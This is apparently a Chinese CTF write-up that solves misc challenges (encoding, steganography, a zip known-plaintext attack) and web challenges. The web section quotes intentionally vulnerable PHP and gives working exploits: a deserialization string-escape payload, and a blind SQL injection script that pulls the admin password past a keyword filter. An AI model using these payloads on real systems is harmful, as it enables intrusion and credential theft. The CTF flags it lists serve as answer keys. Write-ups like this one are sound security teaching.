文章目录
- misc
- misc1
- misc2
- misc3
- misc4
- Web
- Web1
- Web2
- Web3
- Web5
misc
misc1
%26%2365%3B%26%2376%3B%26%2390%3B%26%23107%3B%26%23121%3B%26%2389%3B%26%2377%3B%26%2366%3B%26%2390%3B%26%2351%3B%26%2355%3B%26%23120%3B%26%23102%3B%26%23119%3B%26%2369%3B%26%2371%3B%26%23105%3B%26%23121%3B%26%2357%3B%26%2367%3B%26%2399%3B%26%23101%3B%26%23106%3B%26%23102%3B%26%23100%3B%26%23122%3B%26%2386%3B%26%2384%3B%26%23103%3B%26%23111%3B%26%23102%3B%26%2387%3B%26%23116%3B
urlDecode->htmlDecode->base58
misc2
1张png图片,binwalk分析并分离出mp3文件以及压缩包
用audacity打开mp3文件,查看声道,发现最后面存在一段摩斯电码
将其取出来
-.. ....- ...-- ----. -.... ...-- . ----. ..--- -... ----- .---- ..--- .- .- -...
测试一下,是16的md5值
解密为:n1ce_try
使用n1ce_try作为压缩包密码,得到flag.png
获取flag如下:
flag{Angels_watch_over_you}
misc3
存在零宽字符,尝试解密
得到提示信息
Holly,I know there is a difference between upper and lower case of "angelcup" ,like a-aa n-nn g-gg e-ee l-ll and so on...
Wish U find~
根据提示信息,将angelcup中的出现的字母换为单个字母即可
import base64
data = '50x.html中的base64字符串'
lis = ["AA", "NN", "GG", "LL", "EE", "CC", "UU", "PP"]
for i in lis:
data = data.replace(i, i[0])
with open("flag.png", "wb") as f:
f.write(base64.b64decode(data))
misc4
导出HTTP对象,得到tmp.zip以及几张png图片
根据压缩方法及加密算法,尝试明文攻击
获取密钥: 5b6eeca3 254ebbe5 7719424d
利用得到的密钥k生成一个新的压缩包并且设定密码
解压得到压缩包中的内容,接着将PPT改为ZIP后缀,在\ppt\embeddings下面的Workbook1.xlsx找到flag
flag{tHI5_f1A9_I5_5o_hid3_Bu7_you_f1nD_i7}
Web
Web1
根据题目信息提示 :信息收集直接扫描网站,发现存在www.zip解压压缩包,共计两个文件 index.php以及f1ooog.txt我们直接访问f1ooog.txt即可得到flag
Web2
<?php
error_reporting(0);
function filter($name)
{
$safe = array(
"flag",
"php"
);
$name = str_replace($safe, "hack", $name);
return $name;
}
class test
{
var $user;
var $pass = 'daydream';
function __construct($user)
{
$this->user = $user;
}
}
if (isset($_GET['p'])) {
$param = $_GET['p'];
$param = serialize(new test($param));
$profile = unserialize(filter($param));
if ($profile->pass == 'escaping') {
echo file_get_contents("flag.php");
}
} else {
highlight_file(__FILE__);
}
?>
反序列化字符串逃逸,可参考我另一篇文章:PHP反序列化字符串溢出
构造payload:
p=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}
flag{the_king_of_ser_hiter!}
Web3
根据题目要求编写脚本即可:
import requests,re,time
session=requests.Session()
for i in range(20):
url = "http://111.74.9.131:10085/"
req = session.get(url)
print(req.text)
num = re.findall("<div>(.*?)</div>",req.text)
print(num)
num = "".join(num).split("=")
#print(num)
jieguo = eval(num[0])
answer=''
if jieguo == int(num[1]):
answer="true"
else:
answer="false"
print(answer)
time.sleep(1)
x2 = session.post(url, data={"answer":answer}, verify=False)
print(x2.text)
Web5
swp源码泄露
<?php
// error_reporting(0);
$dbhost = "db";
$dbuser = "root";
$dbpass = "root";
$db = "ctf";
$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db);
mysqli_set_charset($conn,"utf8");
/* sql
create table `admin` (
`id` int(10) not null primary key auto_increment,
`user` varchar(50) not null ,
`pass` varchar(50) not null
);
*/
function filter($str){
$filterlist = "/user|pass|where|case|when|like|regexp|into|limit|=|for|;|\(|\)/";
if(preg_match($filterlist,strtolower($str))){
die("hacker!");
}
return $str;
}
$username = isset($_POST['user'])?filter($_POST['user']):die("please input username!");
$password = isset($_POST['pass'])?filter($_POST['pass']):die("please input password!");
$sql = "select * from admin where user = '$username' and pass = '$password' ";
$res = $conn -> query($sql);
if($res->num_rows>0){
$row = $res -> fetch_assoc();
if($row['id']){
echo $row['user'];
}
}else{
echo "keep on !";
}
/*
提交的flag格式为flag{小写字母数字组合}
*/
?>
注入,根据提供的源码提示,猜测flag是admin密码
编写注入脚本:
import requests
def makeStr(begin,end):
str=""
for i in range(begin,end):
str+=chr(i)
return str
def getPassword():
url="http://111.74.9.131:18001/index.php"
testStr = makeStr(48,127)
payload = "admin' union distinct select -1,2,binary 0x{hex} order by 3 desc, 1 DESC#"
flag = ""
for _ in range(32):
for i in testStr:
data = {"user":payload.format(hex=(flag+i).encode().hex()),"pass":'1'}
res = requests.post(url,data)
#print(res.text)
if "admin" not in res.text:
flag= flag+chr(ord(i)-1)
print("flag:"+flag)
break
else:
pass
if __name__== '__main__':
getPassword()
flag{4e9b954bc4bd3cd5ba6ea9335fbe4b41}
